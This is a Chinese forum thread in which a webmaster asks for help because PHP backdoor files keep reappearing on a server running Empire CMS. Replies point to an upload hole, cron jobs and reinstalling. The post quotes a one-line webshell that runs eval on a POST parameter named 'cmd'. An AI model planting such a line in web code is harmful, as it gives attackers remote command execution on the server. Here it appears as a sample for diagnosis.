服务器大神来支招,网站被挂马!

2017-06-29 18:11:50 +08:00
 ningcool

网站隔几天就会在 web 的一些目录下生成垃圾.php 的脚本文件。比如最近的一个 php 文件:

< php ? php @ eval ( $_POST [ 'cmd ']) ; ? >

只有这么一句话的恶意脚本。

我的服务器在阿里云,也买了安骑士杀毒,但是只能检测到恶意脚本,并隔离,但具体这些脚本怎么生成的无法得知,因为隔离了,几天后又有新的垃圾脚本生成。也就是我的 linux 系统里是不是有后门,怎么揪出来? 还请各位服务器大神给点建议,指点迷津。

11714 次点击
所在节点    Linux
104 条回复
joeke
2017-06-29 23:17:40 +08:00
帝国系统很傻逼好吗,漏洞很多的,挂木马的话,最好重装系统
lan894734188
2017-06-30 01:21:50 +08:00
对用户负责点吧 请个运维很难?
nVic
2017-06-30 01:57:00 +08:00
带哥,花钱买 windows server 吧,linux 真的没意思。。cms 就用 wordpress 吧,没毛病。
Silicon
2017-06-30 02:00:45 +08:00
帝国 CMS 安全?
哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈

检查下 cron.d
WytheHuang
2017-06-30 09:04:09 +08:00
帝国 CMS 业界安全???想笑了~
aitaii
2017-06-30 09:36:00 +08:00
回到了清朝
cevincheung
2017-06-30 09:41:00 +08:00
对帝国蜜汁自信…… 23333
ningcool
2017-06-30 10:02:03 +08:00
@Silicon 我老了吗,带哥什么意思!
ningcool
2017-06-30 10:02:53 +08:00
@tempdban Wordpress 不太适合做 CMS,性能不好
ningcool
2017-06-30 10:04:50 +08:00
@test99 漏洞原因并非是 CMS 的问题啊,可能是我的目录权限什么的都是 777.。。。。
ajan
2017-06-30 10:05:04 +08:00
写个程序 遍历全部文件,并查找 特殊关键字
ningcool
2017-06-30 10:09:18 +08:00
@nVic 不都是 linux 性能好一些吗?
jason19659
2017-06-30 10:09:44 +08:00
业界最安全 6666666
fchypzero
2017-06-30 10:14:14 +08:00
@ningcool 你 777 也要有漏洞才能写进去啊。
8355
2017-06-30 10:16:54 +08:00
我用帝国 cms 的时候好像还是 2012 年.已经不是这个时代的产品了.
AlisaDestiny
2017-06-30 10:19:29 +08:00
http://www.phome.net/
这个网站?
azoon
2017-06-30 10:27:05 +08:00
网站有上传漏洞,帝国 CMS 已经不是这个时代的产物了。如果楼主继续用帝国建议换到 Windows server。你应该不太适合用 Linux,用 Windows 你还能傻瓜式用些软件去查下漏洞,Windows server 性能不差。
ningcool
2017-06-30 10:27:34 +08:00
@AlisaDestiny 哈哈哈 是的!
tempdban
2017-06-30 10:30:11 +08:00
@ningcool 做 cache,再不行直接全静态,腾讯 n 多博客都是 wordpress,要是性能有大问题早就弃用了。
wooyuntest
2017-06-30 11:12:44 +08:00
![1]( https://ooo.0o0.ooo/2017/06/30/5955c0ae9aa0d.png "1")

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/371985

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX